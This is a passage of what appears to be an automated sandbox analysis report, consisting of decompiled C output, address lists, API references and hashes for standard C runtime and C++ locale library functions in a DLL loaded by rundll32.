				intOrPtr* _t32;
				void* _t35;

				E6E2200AC(0x6e268a31, __ebx, __edi, __esi, 0x3c);
				_t32 =  *((intOrPtr*)(_t35 + 8));
				_t34 = 0;
				_t23 = 0;
				 *((intOrPtr*)(_t35 - 0x10)) = 0;
				if(_t32 != 0) {
					_t37 =  *_t32;
					if( *_t32 == 0) {
						_push(0x44);
						_t17 = E6E21F8B6(__edx, 0, _t37);
						 *((intOrPtr*)(_t35 - 0x14)) = _t17;
						 *((intOrPtr*)(_t35 - 4)) = 0;
						if(_t17 != 0) {
							_push(E6E1E1703( *((intOrPtr*)(_t35 + 0xc))));
							_t20 = E6E1E1450(0, _t35 - 0x48, __edx, _t32, 0);
							_t23 = 1;
							_push(0);
							_push(_t20);
							 *((char*)(_t35 - 4)) = 1;
							 *((intOrPtr*)(_t35 - 0x10)) = 1;
							_t34 = E6E21BD9F( *((intOrPtr*)(_t35 - 0x14)), 0);
						}
						 *_t32 = _t34;
						if((_t23 & 0x00000001) != 0) {
							E6E1E14CE(_t35 - 0x48);
						}
					}
				}
				_t15 = 5;
				return E6E220075(_t15);
			}

0x6e21c230
0x6e21c235
0x6e21c238
0x6e21c23a
0x6e21c23c
0x6e21c241
0x6e21c243
0x6e21c245
0x6e21c247
0x6e21c249
0x6e21c24f
0x6e21c252
0x6e21c257
0x6e21c261
0x6e21c265
0x6e21c26d
0x6e21c26e
0x6e21c26f
0x6e21c270
0x6e21c273
0x6e21c27b
0x6e21c27b
0x6e21c27d
0x6e21c282
0x6e21c287
0x6e21c287
0x6e21c282
0x6e21c245
0x6e21c28e
0x6e21c294

APIs

__EH_prolog3.LIBCMT ref: 6E21C230
std::_Locinfo::_Locinfo.LIBCPMT ref: 6E21C265

Part of subcall function 6E1E1450: __EH_prolog3.LIBCMT ref: 6E1E1457
Part of subcall function 6E1E1450: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E1464
Part of subcall function 6E1E1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E1E14A1

numpunct.LIBCPMT ref: 6E21C276

Part of subcall function 6E21BD9F: __EH_prolog3.LIBCMT ref: 6E21BDA6

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E21C287

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
String ID:
API String ID: 495030518-0
Opcode ID: f38f91064a28927fe4ed4d01f9ff91bd8b9e8aa2be123b6557021c5b8a412cb5
Instruction ID: d7d19c46935fcf2b72b34e4d060d71294fd56aa4c7bf56b0b49adc697a4a4342
Opcode Fuzzy Hash: f38f91064a28927fe4ed4d01f9ff91bd8b9e8aa2be123b6557021c5b8a412cb5
Instruction Fuzzy Hash: B5016D79A0421EDBDB45DFE4C851ADEBBFAAF44B85F100525E614AB280CBB04B41C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E18A0, Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 87%

			E6E1E18A0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t12;
				void* _t16;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;

				E6E2200AC(0x6e267d45, __ebx, __edi, __esi, 0x34);
				_t28 =  *((intOrPtr*)(_t31 + 8));
				if(_t28 != 0) {
					_t33 =  *_t28;
					if( *_t28 == 0) {
						_t30 = E6E21F8B6(__edx, __esi, _t33);
						 *((intOrPtr*)(_t31 + 8)) = _t30;
						 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
						_t16 = E6E1E1450(__ebx, _t31 - 0x40, __edx, _t28, _t30, E6E1E1703( *((intOrPtr*)(_t31 + 0xc))), 0x44);
						 *(_t30 + 4) =  *(_t30 + 4) & 0x00000000;
						 *_t30 = 0x6e26a9c0;
						E6E1E1928(_t30, _t16);
						 *_t28 = _t30;
						E6E1E14CE(_t31 - 0x40);
					}
				}
				_t12 = 2;
				return E6E220075(_t12);
			}

0x6e1e18a7
0x6e1e18ac
0x6e1e18b1
0x6e1e18b3
0x6e1e18b6
0x6e1e18bf
0x6e1e18c2
0x6e1e18c8
0x6e1e18d5
0x6e1e18da
0x6e1e18e1
0x6e1e18e7
0x6e1e18ef
0x6e1e18f1
0x6e1e18f1
0x6e1e18b6
0x6e1e18f8
0x6e1e18fe

APIs

__EH_prolog3.LIBCMT ref: 6E1E18A7
std::_Locinfo::_Locinfo.LIBCPMT ref: 6E1E18D5

Part of subcall function 6E1E1450: __EH_prolog3.LIBCMT ref: 6E1E1457
Part of subcall function 6E1E1450: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E1464
Part of subcall function 6E1E1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E1E14A1

ctype.LIBCPMT ref: 6E1E18E7

Part of subcall function 6E1E1928: __Getctype.LIBCPMT ref: 6E1E1937
Part of subcall function 6E1E1928: __Getcvt.LIBCPMT ref: 6E1E1949

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E1E18F1

Part of subcall function 6E1E14CE: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6E1E14F5
Part of subcall function 6E1E14CE: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1566

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_$H_prolog3LocinfoLockit$GetctypeGetcvtLocinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_ctype
String ID:
API String ID: 1262428101-0
Opcode ID: 6b402c894a351771aba23446e0dc5153827fa45ad133f232d542f9a38956b265
Instruction ID: 3dff2b7836515da84c69f6901c1163d2e3d80ca426f2cef45d09b40a278377ee
Opcode Fuzzy Hash: 6b402c894a351771aba23446e0dc5153827fa45ad133f232d542f9a38956b265
Instruction Fuzzy Hash: 61F09AB5A00B0DDFEB10DFD0C411BDDB7AAAF00B19F204818F2195B680DBB456C4DA80

Uniqueness

Uniqueness Score: -1.00%

Function 6E20B968, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 323
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6E20B968(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t135;
				intOrPtr* _t136;
				intOrPtr* _t141;
				void* _t146;
				char _t152;
				signed int _t153;
				char* _t154;
				signed int _t160;
				void* _t166;
				void* _t167;
				char* _t173;
				void* _t174;
				void* _t175;
				void* _t185;
				intOrPtr _t186;
				intOrPtr _t192;
				intOrPtr _t198;
				char* _t199;
				intOrPtr _t213;
				char _t224;
				intOrPtr* _t235;
				signed int _t236;
				signed int _t237;
				intOrPtr _t238;
				signed int _t242;
				signed int _t243;
				char* _t247;
				signed int _t249;
				signed int _t251;
				void* _t252;
				void* _t253;

				_t234 = __edx;
				E6E2200E0(0x6e2686b8, __ebx, __edi, __esi, 0x70);
				_t198 =  *((intOrPtr*)(_t252 + 0x10));
				 *((intOrPtr*)(_t252 - 0x78)) =  *((intOrPtr*)(_t252 + 0xc));
				 *((intOrPtr*)(_t252 - 0x70)) =  *((intOrPtr*)(_t252 + 0x14));
				_t135 =  *(_t252 + 0x1c);
				 *(_t252 - 0x68) = _t135;
				_t136 = E6E20A2F1(_t198, __edx, __edi, __esi, __eflags);
				_t240 = _t136;
				_t245 =  *((intOrPtr*)( *_t136 + 0x14));
				 *0x6e26a26c(_t252 - 0x5c, _t135);
				 *((intOrPtr*)( *((intOrPtr*)( *_t136 + 0x14))))();
				 *(_t252 - 4) =  *(_t252 - 4) & 0x00000000;
				_t255 =  *((intOrPtr*)(_t252 - 0x4c));
				if( *((intOrPtr*)(_t252 - 0x4c)) != 0) {
					 *((char*)(_t252 - 0x5e)) = E6E20DA49(_t240);
				} else {
					 *((char*)(_t252 - 0x5e)) = 0;
				}
				_t141 = E6E20A0FF(_t198, _t234, _t240, _t245, _t255);
				 *0x6e26a26c("0123456789ABCDEFabcdef-+Xx", 0x6e26ba77, _t252 - 0x2c,  *(_t252 - 0x68));
				 *((intOrPtr*)( *((intOrPtr*)( *_t141 + 0x1c))))();
				_t247 =  *((intOrPtr*)(_t252 - 0x78));
				 *((intOrPtr*)(_t252 - 0x6c)) = _t247;
				_t146 = E6E20D7A6(_t198,  *((intOrPtr*)(_t252 - 0x70)));
				if(_t146 != 0) {
					L13:
					_t249 =  *(_t252 + 0x18) & 0x00000e00;
					_t242 = 0xa;
					 *(_t252 - 0x68) = _t242;
					if(_t249 != 0x400) {
						__eflags = _t249 - 0x800;
						if(_t249 != 0x800) {
							asm("sbb esi, esi");
							_t251 =  ~_t249 & _t242;
							__eflags = _t251;
							L19:
							 *((char*)(_t252 - 0x5d)) = 0;
							 *((char*)(_t252 - 0x74)) = 0;
							 *((char*)(_t252 - 0x5f)) = 0;
							E6E20D7A6(_t198,  *((intOrPtr*)(_t252 - 0x70)));
							if(0 != 0) {
								L35:
								__eflags = _t251;
								if(_t251 == 0) {
									L38:
									 *(_t252 - 0x34) =  *(_t252 - 0x34) & 0x00000000;
									 *((intOrPtr*)(_t252 - 0x30)) = 0xf;
									 *(_t252 - 0x44) = 0;
									E6E206BD5(_t252 - 0x44, 1,  *((intOrPtr*)(_t252 - 0x74)));
									 *(_t252 - 4) = 1;
									_t243 = 0;
									 *((intOrPtr*)(_t252 - 0x7c)) =  *((intOrPtr*)(_t252 - 0x78)) + 0x1f;
									_t152 = E6E20D7A6(_t198,  *((intOrPtr*)(_t252 - 0x70)));
									if(_t152 != 0) {
										_t213 =  *((intOrPtr*)(_t252 - 0x30));
										_t153 =  *(_t252 - 0x44);
										L71:
										_t199 =  *((intOrPtr*)(_t252 - 0x5d));
										L72:
										_t235 = _t252 - 0x5c;
										if( *((intOrPtr*)(_t252 - 0x48)) >= 0x10) {
											_t235 =  *((intOrPtr*)(_t252 - 0x5c));
										}
										if(_t199 == 0) {
											L89:
											_t154 =  *((intOrPtr*)(_t252 - 0x78));
											goto L90;
										} else {
											while(_t243 != 0) {
												_t199 =  *_t235;
												if(_t199 == 0x7f) {
													break;
												}
												_t243 = _t243 - 1;
												if(_t243 == 0) {
													L81:
													if(_t243 != 0) {
														L85:
														_t199 = _t235 + 1;
														if( *_t199 > 0) {
															_t235 = _t199;
														}
														continue;
													}
													 *(_t252 - 0x68) = _t252 - 0x44;
													if( *((intOrPtr*)(_t252 - 0x30)) >= 0x10) {
														 *(_t252 - 0x68) = _t153;
													}
													_t213 =  *((intOrPtr*)(_t252 - 0x30));
													if(_t199 <  *( *(_t252 - 0x68))) {
														goto L89;
													} else {
														goto L85;
													}
												}
												 *(_t252 - 0x68) = _t252 - 0x44;
												_t160 =  *(_t252 - 0x44);
												if(_t213 >= 0x10) {
													_t213 =  *((intOrPtr*)(_t252 - 0x30));
													 *(_t252 - 0x68) = _t160;
												}
												_t153 =  *(_t252 - 0x44);
												if(_t199 !=  *((intOrPtr*)( *(_t252 - 0x68) + _t243))) {
													goto L89;
												} else {
													goto L81;
												}
											}
											__eflags =  *((char*)(_t252 - 0x5f));
											_t154 =  *((intOrPtr*)(_t252 - 0x6c));
											if( *((char*)(_t252 - 0x5f)) == 0) {
												 *_t154 = 0x30;
												_t154 = _t154 + 1;
											}
											L90:
											 *_t154 = 0;
											E6E202B76(_t252 - 0x44);
											E6E202B76(_t252 - 0x5c);
											return E6E22008A(_t251, _t199, _t243, _t251);
										}
									}
									 *((char*)(_t252 - 0x74)) = _t152;
									do {
										if( *((char*)(_t198 + 4)) == 0) {
											E6E20C59E(_t198);
										}
										_push( *((intOrPtr*)(_t252 - 0x74)));
										 *((char*)(_t252 - 0x64)) =  *((intOrPtr*)(_t198 + 5));
										_t166 = E6E209DF2(_t252 - 0x2c, _t252 - 0x12, _t252 - 0x64);
										_t253 = _t253 + 0x10;
										_t167 = _t166 - _t252 - 0x2c;
										if(_t167 >=  *(_t252 - 0x68)) {
											_t213 =  *((intOrPtr*)(_t252 - 0x30));
											_t236 = _t252 - 0x44;
											_t153 =  *(_t252 - 0x44);
											__eflags = _t213 - 0x10;
											if(_t213 >= 0x10) {
												_t236 = _t153;
											}
											__eflags =  *((char*)(_t236 + _t243));
											if( *((char*)(_t236 + _t243)) == 0) {
												L64:
												if(_t243 == 0) {
													goto L71;
												}
												_t237 = _t252 - 0x44;
												if(_t213 >= 0x10) {
													_t237 = _t153;
												}
												if( *((char*)(_t237 + _t243)) <= 0) {
													_t199 = 0;
													goto L72;
												} else {
													_t243 = _t243 + 1;
													goto L71;
												}
											} else {
												__eflags =  *((char*)(_t252 - 0x5e));
												if( *((char*)(_t252 - 0x5e)) == 0) {
													goto L64;
												}
												__eflags =  *((char*)(_t198 + 4));
												if( *((char*)(_t198 + 4)) != 0) {
													_t238 =  *((intOrPtr*)(_t252 - 0x64));
												} else {
													E6E20C59E(_t198);
													_t238 =  *((intOrPtr*)(_t198 + 5));
													_t213 =  *((intOrPtr*)(_t252 - 0x30));
													_t153 =  *(_t252 - 0x44);
												}
												__eflags = _t238 -  *((intOrPtr*)(_t252 - 0x5e));
												if(_t238 !=  *((intOrPtr*)(_t252 - 0x5e))) {
													goto L64;
												} else {
													E6E2086F2(_t252 - 0x44, 0);
													_t243 = _t243 + 1;
													__eflags = _t243;
													goto L62;
												}
											}
										} else {
											_t224 =  *((intOrPtr*)(_t167 + "0123456789ABCDEFabcdef-+Xx"));
											_t173 =  *((intOrPtr*)(_t252 - 0x6c));
											 *_t173 = _t224;
											if( *((char*)(_t252 - 0x5f)) != 0 || _t224 != 0x30) {
												if(_t173 <  *((intOrPtr*)(_t252 - 0x7c))) {
													 *((char*)(_t252 - 0x5f)) = 1;
													 *((intOrPtr*)(_t252 - 0x6c)) = _t173 + 1;
												}
											}
											_t174 = _t252 - 0x44;
											 *((char*)(_t252 - 0x5d)) = 1;
											if( *((intOrPtr*)(_t252 - 0x30)) >= 0x10) {
												_t174 =  *(_t252 - 0x44);
											}
											if( *((char*)(_t174 + _t243)) != 0x7f) {
												_t175 = _t252 - 0x44;
												if( *((intOrPtr*)(_t252 - 0x30)) >= 0x10) {
													_t175 =  *(_t252 - 0x44);
												}
												 *((char*)(_t175 + _t243)) =  *((char*)(_t175 + _t243)) + 1;
											}
										}
										L62:
										E6E20BD8B(_t198);
									} while (E6E20D7A6(_t198,  *((intOrPtr*)(_t252 - 0x70))) == 0);
									_t213 =  *((intOrPtr*)(_t252 - 0x30));
									_t153 =  *(_t252 - 0x44);
									goto L64;
								}
								L36:
								__eflags = _t251 - _t242;
								if(_t251 == _t242) {
									goto L38;
								}
								L37:
								 *(_t252 - 0x68) = ((0 | _t251 != 0x00000008) - 0x00000001 & 0xfffffff2) + 0x16;
								goto L38;
							}
							if( *((intOrPtr*)(_t198 + 4)) == 0) {
								E6E20C59E(_t198);
							}
							if( *((intOrPtr*)(_t198 + 5)) !=  *((intOrPtr*)(_t252 - 0x2c))) {
								goto L35;
							} else {
								 *((char*)(_t252 - 0x5d)) = 1;
								 *((char*)(_t252 - 0x74)) = 1;
								E6E20BD8B(_t198);
								_t185 = E6E20D7A6(_t198,  *((intOrPtr*)(_t252 - 0x70)));
								if(1 != 0) {
									L33:
									__eflags = _t251;
									if(_t251 != 0) {
										goto L36;
									}
									_t251 = 8;
									goto L35;
								}
								if( *((intOrPtr*)(_t198 + 4)) == _t185) {
									E6E20C59E(_t198);
								}
								_t186 =  *((intOrPtr*)(_t198 + 5));
								if(_t186 ==  *((intOrPtr*)(_t252 - 0x13))) {
									L30:
									if(_t251 == 0 || _t251 == 0x10) {
										_t251 = 0x10;
										 *((char*)(_t252 - 0x5d)) = 0;
										 *((char*)(_t252 - 0x74)) = 0;
										E6E20BD8B(_t198);
										goto L37;
									} else {
										goto L33;
									}
								} else {
									if( *((char*)(_t198 + 4)) == 0) {
										E6E20C59E(_t198);
										_t186 =  *((intOrPtr*)(_t198 + 5));
									}
									if(_t186 !=  *((intOrPtr*)(_t252 - 0x14))) {
										goto L33;
									} else {
										goto L30;
									}
								}
							}
						}
						_push(0x10);
						L17:
						_pop(_t251);
						goto L19;
					}
					_push(8);
					goto L17;
				} else {
					if( *((intOrPtr*)(_t198 + 4)) == _t146) {
						E6E20C59E(_t198);
					}
					_t192 =  *((intOrPtr*)(_t198 + 5));
					if(_t192 !=  *((intOrPtr*)(_t252 - 0x15))) {
						__eflags =  *((char*)(_t198 + 4));
						if( *((char*)(_t198 + 4)) == 0) {
							E6E20C59E(_t198);
							_t192 =  *((intOrPtr*)(_t198 + 5));
						}
						__eflags = _t192 -  *((intOrPtr*)(_t252 - 0x16));
						if(_t192 !=  *((intOrPtr*)(_t252 - 0x16))) {
							goto L13;
						} else {
							 *_t247 = 0x2d;
							goto L12;
						}
					} else {
						 *_t247 = 0x2b;
						L12:
						 *((intOrPtr*)(_t252 - 0x6c)) = _t247 + 1;
						E6E20BD8B(_t198);
						goto L13;
					}
				}
			}

0x6e20b968
0x6e20b96f
0x6e20b977
0x6e20b97a
0x6e20b980
0x6e20b983
0x6e20b987
0x6e20b98a
0x6e20b98f
0x6e20b998
0x6e20b99d
0x6e20b9a5
0x6e20b9a7
0x6e20b9ab
0x6e20b9af
0x6e20b9be
0x6e20b9b1
0x6e20b9b1
0x6e20b9b1
0x6e20b9c4
0x6e20b9e1
0x6e20b9e9
0x6e20b9eb
0x6e20b9f5
0x6e20b9f8
0x6e20b9ff
0x6e20ba3f
0x6e20ba44
0x6e20ba4a
0x6e20ba4b
0x6e20ba54
0x6e20ba5a
0x6e20ba60
0x6e20ba69
0x6e20ba6b
0x6e20ba6b
0x6e20ba6d
0x6e20ba74
0x6e20ba77
0x6e20ba7a
0x6e20ba7d
0x6e20ba84
0x6e20bb04
0x6e20bb04
0x6e20bb06
0x6e20bb1e
0x6e20bb21
0x6e20bb2a
0x6e20bb31
0x6e20bb35
0x6e20bb45
0x6e20bb49
0x6e20bb4b
0x6e20bb4e
0x6e20bb55
0x6e20bc5d
0x6e20bc60
0x6e20bc63
0x6e20bc63
0x6e20bc66
0x6e20bc6a
0x6e20bc6d
0x6e20bc6f
0x6e20bc6f
0x6e20bc74
0x6e20bcdd
0x6e20bcdd
0x00000000
0x6e20bc76
0x6e20bc76
0x6e20bc7a
0x6e20bc7f
0x00000000
0x00000000
0x6e20bc81
0x6e20bc84
0x6e20bca5
0x6e20bca7
0x6e20bcc2
0x6e20bcc2
0x6e20bcc8
0x6e20bcca
0x6e20bcca
0x00000000
0x6e20bcc8
0x6e20bcb0
0x6e20bcb3
0x6e20bcb5
0x6e20bcb5
0x6e20bcbd
0x6e20bcc0
0x00000000
0x00000000
0x00000000
0x00000000
0x6e20bcc0
0x6e20bc89
0x6e20bc8c
0x6e20bc92
0x6e20bc94
0x6e20bc97
0x6e20bc97
0x6e20bca0
0x6e20bca3
0x00000000
0x00000000
0x00000000
0x00000000
0x6e20bca3
0x6e20bcce
0x6e20bcd2
0x6e20bcd5
0x6e20bcd7
0x6e20bcda
0x6e20bcda
0x6e20bce0
0x6e20bce3
0x6e20bce6
0x6e20bcee
0x6e20bcfa
0x6e20bcfa
0x6e20bc74
0x6e20bb5b
0x6e20bb5e
0x6e20bb62
0x6e20bb66
0x6e20bb66
0x6e20bb6e
0x6e20bb71
0x6e20bb80
0x6e20bb88
0x6e20bb8b
0x6e20bb90
0x6e20bbdc
0x6e20bbdf
0x6e20bbe2
0x6e20bbe5
0x6e20bbe8
0x6e20bbea
0x6e20bbea
0x6e20bbec
0x6e20bbf0
0x6e20bc42
0x6e20bc44
0x00000000
0x00000000
0x6e20bc46
0x6e20bc4c
0x6e20bc4e
0x6e20bc4e
0x6e20bc54
0x6e20bc59
0x00000000
0x6e20bc56
0x6e20bc56
0x00000000
0x6e20bc56
0x6e20bbf2
0x6e20bbf2
0x6e20bbf6
0x00000000
0x00000000
0x6e20bbf8
0x6e20bbfc
0x6e20bc10
0x6e20bbfe
0x6e20bc00
0x6e20bc05
0x6e20bc08
0x6e20bc0b
0x6e20bc0b
0x6e20bc13
0x6e20bc16
0x00000000
0x6e20bc18
0x6e20bc1d
0x6e20bc22
0x6e20bc22
0x00000000
0x6e20bc22
0x6e20bc16
0x6e20bb92
0x6e20bb96
0x6e20bb9c
0x6e20bb9f
0x6e20bba1
0x6e20bbab
0x6e20bbae
0x6e20bbb2
0x6e20bbb2
0x6e20bbab
0x6e20bbb9
0x6e20bbbc
0x6e20bbc0
0x6e20bbc2
0x6e20bbc2
0x6e20bbc9
0x6e20bbcf
0x6e20bbd2
0x6e20bbd4
0x6e20bbd4
0x6e20bbd7
0x6e20bbd7
0x6e20bbc9
0x6e20bc23
0x6e20bc25
0x6e20bc34
0x6e20bc3c
0x6e20bc3f
0x00000000
0x6e20bc3f
0x6e20bb08
0x6e20bb08
0x6e20bb0a
0x00000000
0x00000000
0x6e20bb0c
0x6e20bb1b
0x00000000
0x6e20bb1b
0x6e20ba89
0x6e20ba8d
0x6e20ba8d
0x6e20ba98
0x00000000
0x6e20ba9a
0x6e20ba9e
0x6e20baa1
0x6e20baa4
0x6e20baae
0x6e20bab5
0x6e20bafd
0x6e20bafd
0x6e20baff
0x00000000
0x00000000
0x6e20bb03
0x00000000
0x6e20bb03
0x6e20baba
0x6e20babe
0x6e20babe
0x6e20bac3
0x6e20bac9
0x6e20bae0
0x6e20bae2
0x6e20baef
0x6e20baf0
0x6e20baf3
0x6e20baf6
0x00000000
0x00000000
0x00000000
0x00000000
0x6e20bacb
0x6e20bacf
0x6e20bad3
0x6e20bad8
0x6e20bad8
0x6e20bade
0x00000000
0x00000000
0x00000000
0x00000000
0x6e20bade
0x6e20bac9
0x6e20ba98
0x6e20ba62
0x6e20ba64
0x6e20ba64
0x00000000
0x6e20ba64
0x6e20ba56
0x00000000
0x6e20ba01
0x6e20ba04
0x6e20ba08
0x6e20ba08
0x6e20ba0d
0x6e20ba13
0x6e20ba1a
0x6e20ba1e
0x6e20ba22
0x6e20ba27
0x6e20ba27
0x6e20ba2a
0x6e20ba2d
0x00000000
0x6e20ba2f
0x6e20ba2f
0x00000000
0x6e20ba2f
0x6e20ba15
0x6e20ba15
0x6e20ba32
0x6e20ba37
0x6e20ba3a
0x00000000
0x6e20ba3a
0x6e20ba13

APIs

__EH_prolog3_GS.LIBCMT ref: 6E20B96F

Part of subcall function 6E20A2F1: __EH_prolog3.LIBCMT ref: 6E20A2F8
Part of subcall function 6E20A2F1: std::_Lockit::_Lockit.LIBCPMT ref: 6E20A302
Part of subcall function 6E20A2F1: int.LIBCPMT ref: 6E20A319
Part of subcall function 6E20A2F1: std::_Lockit::~_Lockit.LIBCPMT ref: 6E20A373

_Find_unchecked1.LIBCPMT ref: 6E20BB80

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 6E20B9D7

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Find_unchecked1H_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 1853221402-2799312399
Opcode ID: a9fa03192273bbec4100fdc6bbc0c86037cdef9073a714188b04bbb435a9cf5b
Instruction ID: 9058b79f0aed7c49f61ba439b98479c1ba6c938a87b63f456b38d7e56f044c7b
Opcode Fuzzy Hash: a9fa03192273bbec4100fdc6bbc0c86037cdef9073a714188b04bbb435a9cf5b
Instruction Fuzzy Hash: A6C19E34D1828E8FDF62CBE8C490BDCBBB7AF45304F1444A9D8966B2CECB649945CB10

Uniqueness

Uniqueness Score: -1.00%

Function 6E2460ED, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMONLIBRARYCODE

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6E24617D

Strings

pow, xrefs: 6E246155, 6E246172

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 9a38686656c69bb31b5986953c7049778537250d33f103edfcf7d9ba770ff6b0
Instruction ID: c41f90c39b4b520227d771ef12d26310ff06030748f0458a2c9aae07ff911396
Opcode Fuzzy Hash: 9a38686656c69bb31b5986953c7049778537250d33f103edfcf7d9ba770ff6b0
Instruction Fuzzy Hash: DE51ACE1AB810FD7DB456BE4CB9075A3BA7EB01B02F20CD5CD095823DDEB3184A4DA52

Uniqueness

Uniqueness Score: -1.00%

Function 6E25DBAF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E6E25DBAF(void* __ecx, signed int _a4, intOrPtr _a8) {
				int _v8;
				int _t15;
				int _t16;
				signed int _t17;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t15 = E6E254323(_t23, __eflags, _a8 + 0x250, 0x20001004,  &_v8, 2);
					__eflags = _t15;
					if(_t15 != 0) {
						_t16 = _v8;
						__eflags = _t16;
						if(_t16 == 0) {
							_t16 = GetACP();
						}
						L25:
						return _t16;
					}
					L22:
					_t16 = 0;
					goto L25;
				}
				_t17 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x6e272f08;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t17;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x6e272f10;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								_t49 = _t17;
								if(_t17 != 0) {
									_t16 = E6E24BF09(_t23, _t23);
									goto L25;
								}
								if(E6E254323(_t23, _t49, _a8 + 0x250, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t16 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t17 = _t17 | 0x00000001;
						__eflags = _t17;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				__eflags = _t26;
				goto L9;
			}

0x6e25dbb4
0x6e25dbb5
0x6e25dbbc
0x6e25dc62
0x6e25dc76
0x6e25dc7b
0x6e25dc7d
0x6e25dc83
0x6e25dc86
0x6e25dc88
0x6e25dc8a
0x6e25dc8a
0x6e25dc90
0x6e25dc95
0x6e25dc95
0x6e25dc7f
0x6e25dc7f
0x00000000
0x6e25dc7f
0x6e25dbc2
0x6e25dbc7
0x00000000
0x00000000
0x6e25dbcd
0x6e25dbd2
0x6e25dbd4
0x6e25dbd4
0x6e25dbda
0x00000000
0x00000000
0x6e25dbdf
0x6e25dbf6
0x6e25dbf6
